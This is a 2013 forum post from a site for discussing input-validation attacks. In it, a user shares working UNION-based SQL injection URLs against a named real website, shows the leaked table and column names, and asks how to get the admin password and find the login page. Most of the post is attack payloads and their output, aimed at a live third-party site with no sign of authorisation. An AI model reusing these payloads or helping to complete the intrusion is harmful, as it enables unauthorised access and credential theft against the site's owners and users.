Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
can't find admin page and user password table
Posted by: a_tek7
Date: June 30, 2013 12:11PM

http://www.charly-didgeridoo.com/cd.php?ord=3%20UNION%20SELECT%201,user%28%29,3,4,5,6,7,8,9,GROUP_CONCAT%28table_name%29,11,12+from+information_schema.tables%20where%20table_schema=database%28%29--

result:

ADMIN_DF_didj_pro,
admin,
alex_livre_censure,alex_livre_ip,alex_livre_messages,

http://www.charly-didgeridoo.com/cd.php?ord=3%20UNION%20SELECT%201,user%28%29,3,4,5,6,7,8,9,GROUP_CONCAT%28column_name%29,11,12+from+information_schema.columns%20where%20table_name=CHAR%2897,%20100,%20109,%20105,%20110%29--

Result:

ID,Email,Color1,Color2

http://www.charly-didgeridoo.com/cd.php?ord=3%20UNION%20SELECT%201,user%28%29,3,4,5,6,7,8,9,GROUP_CONCAT(Color1,0x3a,Color2),11,12+from+admin--
Result:

:

http://www.charly-didgeridoo.com/cd.php?ord=3%20UNION%20SELECT%201,user%28%29,3,4,5,6,7,8,9,GROUP_CONCAT%28column_name%29,11,12+from+information_schema.columns%20where%20table_name=CHAR(65, 68, 77, 73, 78, 95, 68, 70, 95, 100, 105, 100, 106, 95, 112, 114, 111)--

Result:

ID,Pseudo,Prénom,Nom,Description,URL,DF_Ville,Ville_nomreel,DF_URL_profil,Carte_Position_X,Carte_Position_Y,Date_creation,
Date_modification,Logo,Photo_profil,Breve_description,Options,URL_Rewriting

How can I find admin password and admin login page?
Is there any way to find admin page without using havij?

Options: ReplyQuote


Sorry, only registered users may post in this forum.